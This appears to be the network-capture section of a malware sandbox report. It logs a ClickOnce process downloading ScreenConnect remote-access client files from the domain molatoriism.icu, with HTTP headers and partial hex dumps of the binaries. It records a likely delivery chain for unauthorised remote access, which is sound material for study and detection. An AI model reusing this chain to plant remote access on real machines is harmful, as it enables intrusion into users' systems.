2024-11-07 17:04:20 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:20 GMT
                                                                                                                                                                              Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                              Content-Length: 147976
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1Q2sy2Nxn666V%2BRQPkz21iSvaEwCNxu83ln6TsKN7drFOoENUN9cPLPV5FV%2FZ9tiyv%2FuFMuLWY93Wb%2FEfB5btSZ7clOZ4RwCg9RZWx9szzfw7iD6L0LL%2Bw67qyE5aNC8oU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee6da89827988-DEN
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19161&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1208&delivery_rate=151250&cwnd=32&unsent_bytes=0&cid=3d1fadce72f7e43d&ts=1105&x=0"
2024-11-07 17:04:20 UTC | 563 | IN
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-11-07 17:04:20 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: microsoft-com:clickonce.v2"> <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /> <descr
2024-11-07 17:04:20 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: twise, LLC&quot;, L=Tampa, S=Florida, C=US" issuerKeyHash="6837e0ebb63bf85f1186fbfe617b088865f44e42" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/
2024-11-07 17:04:20 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: nifestInformation><as:SignedBy /><as:AuthenticodePublisher><as:X509SubjectName>CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US</as:X509SubjectName></as:AuthenticodePublisher></r:grant><r:issuer><Signature Id="AuthenticodeSignature" x


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:22 UTC | 97 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:22 UTC | 770 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RixdxCcySwBv0%2Fy2rBSdQwiAMm3SPK3CIj7rboIVSGWp%2BxacbDO0WH05MWG1rP7xlhuQedhmp2ouF574zONIq2sdOyqRVRJW4JsCP7Sx0JLqzc3BtN3ZtgVhVzqnV%2BpxxLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee6ebbcd9b789-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1335&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=2182366&cwnd=39&unsent_bytes=0&cid=37416cbe6ba37539&ts=608&x=0"
2024-11-07 17:04:22 UTC | 599 | IN
                                                                                                                                                                              Data Ascii: 4000<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmln
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: t.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" /> <application /> <entryPoint> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.899
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: pendency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Client.dll" size="197120"> <assemblyIdentity name="ScreenConnect.Client" version="24.2.10.8991" publicKeyToken="4B14C015C8
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: </dependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Core.dll" size="548864"> <assemblyIdentity name="ScreenConnect.Core" version="24.2.10.8991" publicKeyToken="4B14C015C8
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: cy> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.WindowsClient.exe" size="601376"> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: 000/09/xmldsig#sha1" /> <dsig:DigestValue>OOq26dmbXK7slwOITSW+jYEWIKk=</dsig:DigestValue> </hash> </file> <file name="ScreenConnect.WindowsBackstageShell.exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transfo
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: xe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
2024-11-07 17:04:22 UTC | 1369 | IN
                                                                                                                                                                              Data Ascii: mpeg:mpeg21:2003:01-REL-R-NS" xmlns:as="http://schemas.microsoft.com/windows/pki/2005/Authenticode"><r:grant><as:ManifestInformation Hash="8b12c1e48824eb1c03c721ad50e279d1d602bc95" Description="" Url=""><as:assemblyIdentity name="ScreenConnect.WindowsClie
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 4a 67 4c 30 45 4c 2f 4c 6b 6e 72 74 6c 4f 41 36 36 57 4e 61 76 31 65 58 65 5a 43 76 64 6b 6f 4f 34 43 73 43 41 73 79 51 61 59 46 74 7a 77 79 65 56 4e 48 64 48 53 36 38 47 4b 41 74 44 65 6d 49 36 30 38 69 70 66 71 37 57 63 4f 43 51 4b 46 44 44 57 6a 44 51 43 77 62 4a 6a 77 33 62 6f 66 79 41 53 4e 70 45 46 55 74 66 73 46 68 66 4e 49 45 45 70 55 32 46 53 71 66 51 75 49 39 7a 7a 77 33 2f 31 66 7a 65 36 4e 79 71 59 69 47 58 78 74 75 6a 46 52 38 38 49 31 72 70 4e 37 5a 51 75 48 55 4d 52 30 31 6e 4f 44 57 59 58 70 47 43 65 4f 35 65 74 36 36 45 43 73 73 69 4d 64 76 6d 31 44 42 6d 4a 49 77 64 61 35 36 63 69 5a 6f 37 6c 58 52 33 4a 6a 2b 38 41 67 53 59 61 75 70 35 33 57 62 7a 62 71 31 4b 41 6a 78 71 76 44 6d 37 59 77 75 35 47 43 4b 77 41 70 36 6a 49 73 54 44 74 4b
                                                                                                                                                                              Data Ascii: JgL0EL/LknrtlOA66WNav1eXeZCvdkoO4CsCAsyQaYFtzwyeVNHdHS68GKAtDemI608ipfq7WcOCQKFDDWjDQCwbJjw3bofyASNpEFUtfsFhfNIEEpU2FSqfQuI9zzw3/1fze6NyqYiGXxtujFR88I1rpN7ZQuHUMR01nODWYXpGCeO5et66ECssiMdvm1DBmJIwda56ciZo7lXR3Jj+8AgSYaup53Wbzbq1KAjxqvDm7Ywu5GCKwAp6jIsTDtK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49717 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:28 UTC | 99 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:28 UTC | 792 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEIOsoEGMfZebSqRBXPIKMhYuwF9uuUbppWz%2FGUgR7wKzxzBabn%2FnMbMcasTsYQiPL6qM%2FuLWrTx0G1MwXraS6Buj8zipP704Lq8WT12J0ePF3nOTiEHgevaNuPAvLrdB2c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7115a782cc7-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=714&delivery_rate=1693567&cwnd=251&unsent_bytes=0&cid=ad774a4b662f69d8&ts=349&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49721 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:30 UTC | 107 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:30 UTC | 796 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:30 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFRjwY7qv%2Fbvg%2Bmqt1iRl2Ccp6A0E2OdyxjqbzZ6ByHLo67zbOQ3hPXvW7MvpaD033WQwxgr8V4nWTU%2Fvj%2BKe3s7kNtWazBWa24ImJ2WGCuUeNeypM%2BAa6bp1DFc9AlyKUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee71cd90c6c4a-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=722&delivery_rate=2661764&cwnd=251&unsent_bytes=0&cid=9b09ff5d4c34468e&ts=316&x=0"
                                                                                                                                                                              Data Ascii: |d(&{d({,!7(( |d(&{d({,(}d{d({,*s(5+*0]o(,o*so(,o',o[os,o[*6G
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 00 00 2b 6f bc 01 00 0a 0a 2b 66 06 6f bd 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 d7 00 00 0a 02 28 be 01 00 0a 0b 12 01 28 d9 00 00 0a 02 28 bd 00 00 0a 0c 12 02 28 86 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 db 00 00 0a 59 02 28 bd 00 00 0a 0c 12 02 28 bf 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 dd 00 00 0a 59 73 c0 01 00 0a 6f 98 00 00 06 06 6f 70 00 00 0a 2d 92 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 18 00 72 8a 00 0a 00 00 00 00 1e 02 28 c1 01 00 0a 2a 22 02 03 28 f9 00 00 0a 2a 22 02 03 6f c2 01 00 0a 2a 00 00 13 30 04 00 60 00 00 00 25 00 00 11 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 02 6f c3 01 00 0a 0a 12 00 28 bf 01 00 0a 02 28 04 01 00 0a 2c 2c 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 6b 02 28 04 01 00 0a 6f c4 01 00 0a
                                                                                                                                                                              Data Ascii: +o+fo((((((((Y((((Ysoop-,o[*r(*"(*"o*0`%o(o((,,o(k(o


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49722 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:31 UTC | 111 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:32 UTC | 769 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OcmTTD2zQ%2Bgzhh69Zo8HREEk%2BcclFSp3jweb2GrIvbrBJr2lfmRKPfu2VxgMGLrUSeAEVtQxGV77kSyvOthGQZTs2W9E9H6dqYgRt5qSewGeJ84PoSg7maSNHudMrRkR7s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7259f9c6bd4-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=726&delivery_rate=1910290&cwnd=251&unsent_bytes=0&cid=ed74304afccacfe6&ts=817&x=0"
2024-11-07 17:04:32 UTC | 273 | IN | Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
2024-11-07 17:04:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49729 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:33 UTC | 106 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:33 UTC | 771 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:33 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDYT1xl%2Bt84YY2SOlLLLv1W7opLDOPr%2F0Qhww2WwB7TiE8XkBoHexwJriti21G8APK2%2F0hVZbtXEXm7Ydy90KOtX90bo57ykJQz1V6uWCsCdWKKgL900cJhsZtkEyyddLM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee72efda9e796-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1379&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=721&delivery_rate=2058280&cwnd=251&unsent_bytes=0&cid=e220a32194fbab39&ts=751&x=0"
2024-11-07 17:04:33 UTC | 273 | IN | Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
2024-11-07 17:04:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49738 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:34 UTC | 114 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:34 UTC | 773 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:34 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDYKMIgG5TW7wXjZOBB9tK%2Frs2ks07zxEr0TJ2tHKzJS6FkDLX0YREog8QR1Uel33m9XTTVt%2Fx5K0Wi%2BktisnTJ6qmIhbPxQHPgb1SvNlGOUnLYmvEaWqJy5pcd%2BJKqukN0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee737993ab78c-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=729&delivery_rate=1223489&cwnd=158&unsent_bytes=0&cid=b40f982a6465c80a&ts=301&x=0"
2024-11-07 17:04:34 UTC | 273 | IN | Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
2024-11-07 17:04:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49742 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:35 UTC | 104 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
2024-11-07 17:04:35 UTC | 792 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:35 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKiZ2PyIMJJUDBtNkWOqYAJ3kdCgxrGfuVpwxyq1%2BfFQ7YTmb7qOxxAjt4qjEPmQeVZ4rb9YSYcpSVoW2QUyAMGBuVNc8dquBC%2BbnDG8UDcBuE%2FfqQ0UqQlXxUsSl94XLRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee73d59ed2c87-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=719&delivery_rate=1983561&cwnd=228&unsent_bytes=0&cid=3d8259312e81882e&ts=327&x=0"
2024-11-07 17:04:35 UTC | 577 | IN | Data Ascii: 7d3dMZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                              Data Ascii: .38=BGLQ3V.[`).ejoty~Q %'[.'*.{...#.+.3.;.C.KCc.C.cc.c.ckc
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 54 56 45 5f 54 4f 47 47 4c 45 00 54 56 49 46 5f 53 54 41 54 45 00 4d 41 58 5f 54 45 58 54 5f 53 49 5a 45 00 52 65 63 74 61 6e 67 6c 65 46 00 4d 53 47 00 57 48 00 47 57 4c 00 54 56 4d 5f 47 45 54 4e 45 58 54 49 54 45 4d 00 54 56 49 54 45 4d 00 46 4f 52 43 45 46 49 4c 45 53 59 53 54 45 4d 00 4d 49 49 4d 00 42 4f 54 54 4f 4d 00 57 4d 00 53 49 47 44 4e 00 46 4f 52 43 45 53 48 4f 57 48 49 44 44 45 4e 00 3c 3e 4f 00 4d 45 4e 55 49 54 45 4d 49 4e 46 4f 00 3c 64 69 61 6c 6f 67 3e 50 00 46 44 41 50 00 54 4f 50 00 53 57 50 00 48 49 44 45 50 49 4e 4e 45 44 50 4c 41 43 45 53 00 48 49 44 45 4d 52 55 50 4c 41 43 45 53 00 4d 46 53 00 54 56 49 53 00 46 49 4c 45 4f 50 45 4e 44 49 41 4c 4f 47 4f 50 54 49 4f 4e 53 00 41 4c 4c 4f 57 4d 55 4c 54 49 53 45 4c 45 43 54 00 52 45
                                                                                                                                                                              Data Ascii: TVE_TOGGLETVIF_STATEMAX_TEXT_SIZERectangleFMSGWHGWLTVM_GETNEXTITEMTVITEMFORCEFILESYSTEMMIIMBOTTOMWMSIGDNFORCESHOWHIDDEN<>OMENUITEMINFO<dialog>PFDAPTOPSWPHIDEPINNEDPLACESHIDEMRUPLACESMFSTVISFILEOPENDIALOGOPTIONSALLOWMULTISELECTRE
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 74 65 00 73 74 61 74 65 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 4f 76 65 72 77 72 69 74 65 00 53 54 41 54 68 72 65 61 64 41 74 74 72 69 62 75 74 65 00 45 6d 62 65 64 64 65 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 43 6c 61 73 73 49 6e 74 65 72 66 61 63 65 41 74 74 72 69 62 75 74 65 00 55 6e 76 65 72 69 66 69 61 62 6c 65 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 41 74 74 72 69 62 75 74 65 55 73 61 67 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 4e 75 6c 6c 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74
                                                                                                                                                                              Data Ascii: testateScreenConnect.IFileDialogEvents.OnOverwriteSTAThreadAttributeEmbeddedAttributeCompilerGeneratedAttributeGuidAttributeClassInterfaceAttributeUnverifiableCodeAttributeAttributeUsageAttributeDebuggableAttributeNullableAttributeComVisibleAt
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 74 49 74 65 6d 00 68 69 74 65 6d 00 53 79 73 74 65 6d 00 67 65 74 5f 42 6f 74 74 6f 6d 00 62 6f 74 74 6f 6d 00 45 6e 75 6d 00 50 65 6e 00 43 6c 69 65 6e 74 54 6f 53 63 72 65 65 6e 00 63 43 68 69 6c 64 72 65 6e 00 4d 61 69 6e 00 46 69 78 75 70 41 70 70 44 6f 6d 61 69 6e 00 45 78 74 72 61 63 74 41 73 73 6f 63 69 61 74 65 64 49 63 6f 6e 00 56 65 72 73 69 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 67 65 74 5f 4c 6f 63 61 74 69 6f 6e 00 47 65 74 4d 65 73 73 61 67 65 4d 6f 75 73 65 53 63 72 65 65 6e 4c 6f 63 61 74 69 6f 6e 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 53 68 61 72 65 56 69 6f 6c 61 74 69 6f 6e 00 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 69 74 65 6d 41 63 74 69 6f 6e 00 53
                                                                                                                                                                              Data Ascii: tItemhitemSystemget_BottombottomEnumPenClientToScreencChildrenMainFixupAppDomainExtractAssociatedIconVersionApplicationget_LocationGetMessageMouseScreenLocationScreenConnect.IFileDialogEvents.OnShareViolationSystemInformationitemActionS


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
8  192.168.2.5  49747  172.67.182.214  443  7120  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp  Bytes transferred  Direction  Data
2024-11-07 17:04:36 UTC  92  OUT  GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 17:04:37 UTC  775  IN  HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:37 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFi3i%2BZTB1%2Bjm4xhyJCl2YglEAbSUaJXVOE3I%2F%2Ffni4s3F5%2FT09IXb7y7uQQF6flOInPxAYhfppsFDmw7uGD6xu8sUdKSOItkHt2mes6fUtOKUwZJWA2XSnsHtKWbZ9MIGo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee746edcee73a-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=707&delivery_rate=1807740&cwnd=243&unsent_bytes=0&cid=5745e6f97c2cda2d&ts=622&x=0"


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
9  192.168.2.5  49757  172.67.182.214  443  7120  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp  Bytes transferred  Direction  Data
2024-11-07 17:04:39 UTC  99  OUT  GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 17:04:40 UTC  773  IN  HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:40 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
